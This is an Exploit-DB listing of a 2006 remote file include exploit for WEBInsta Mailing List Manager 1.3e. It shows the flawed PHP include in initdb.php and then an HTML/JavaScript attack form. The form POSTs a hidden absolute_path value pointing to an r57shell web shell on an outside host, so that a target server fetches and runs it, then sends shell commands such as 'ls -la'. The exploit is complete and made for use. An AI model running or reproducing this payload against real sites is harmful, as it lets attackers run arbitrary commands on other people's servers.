WEBInsta MM <= 1.3e absolute_path Remote File Include Exploit

2006-08-15T00:00:00
ID EDB-ID:2187
Type exploitdb
Reporter str0ke
Modified 2006-08-15T00:00:00

Description

WEBInsta MM <= 1.3e (absolute_path) Remote File Include Exploit. Webapps exploit for php platform

                                        
                                            &lt;!--
vulnerable code: /maillist/inc/initdb.php
-----------------------------------------------------------------------
if(isset($_GET['absolute_path']))
 {
echo "no access from here !!";
exit;
}

include($absolute_path.'inc/adodbt/db.inc');
-----------------------------------------------------------------------
The above snippet does not stop post requests to the absolute_path variable.

A r57shell with a twist.

o---[ r57shell - http-shell by RST/GHC | http://rst.void.ru | http://ghc.ru | version 1.31 ]---o

/str0ke ! milw0rm.com
--&gt;

&lt;head&gt;
&lt;title&gt;WEBInsta Mailing List Manager &lt;= 1.3e (initdb.php) Remote File Include Exploit&lt;/title&gt;
&lt;/head&gt;
&lt;script language="JavaScript"&gt;
function milw0rm() {
  if (document.exploit.target.value=="") {
    alert("Enter a Target");
    return false;
  }

  exploit.action= document.exploit.target.value;
  exploit.cmd.value=document.exploit.cmd.value;
  exploit.dir.value=document.exploit.dir.value;
  exploit.submit();
}
&lt;/script&gt;
&lt;body&gt;
&lt;form name="exploit" target="exploitframe" method="post" onSubmit="milw0rm();"&gt;
  &lt;table width="975" border="0"&gt;
    &lt;tr&gt;
      &lt;td width="961" align="left" valign="top" nowrap="nowrap"&gt;&lt;strong&gt;WEBInsta Mailing List Manager &lt;= 1.3e (initdb.php) Remote File Include Exploit&lt;/strong&gt;&lt;/td&gt;

    &lt;/tr&gt;
    &lt;tr&gt;
      &lt;td&gt;&lt;em&gt;
        &lt;input type="hidden" name="absolute_path" value="http://rst.void.ru/download/r57shell.txt?&" /&gt;
        &lt;/em&gt;&lt;strong&gt;*&lt;/strong&gt;&lt;em&gt;target&lt;/em&gt;
        &lt;input name="target" type="text" value="http://www.site.com/maillist/inc/initdb.php" size="50" maxlength="150" /&gt;
        &lt;strong&gt; *&lt;/strong&gt;&lt;em&gt;cmd&lt;/em&gt;

        &lt;input name="cmd" type="text" value="ls -la"&gt;
        &lt;strong&gt;*&lt;/strong&gt;&lt;em&gt;dir&lt;/em&gt;
        &lt;input name="dir" type="text" value="."&gt;
        &lt;em&gt;
        &lt;input type="submit" name="Submit" value="Exploit" /&gt;
        &lt;/em&gt;&lt;/td&gt;
    &lt;/tr&gt;
  &lt;/table&gt;

  &lt;p&gt;
    &lt;iframe name="exploitframe" height="410" width="1100" scrolling="yes" frameborder="0"&gt;&lt;/iframe&gt;
  &lt;/p&gt;
&lt;/form&gt;
&lt;/body&gt;
&lt;/html&gt;

# milw0rm.com [2006-08-15]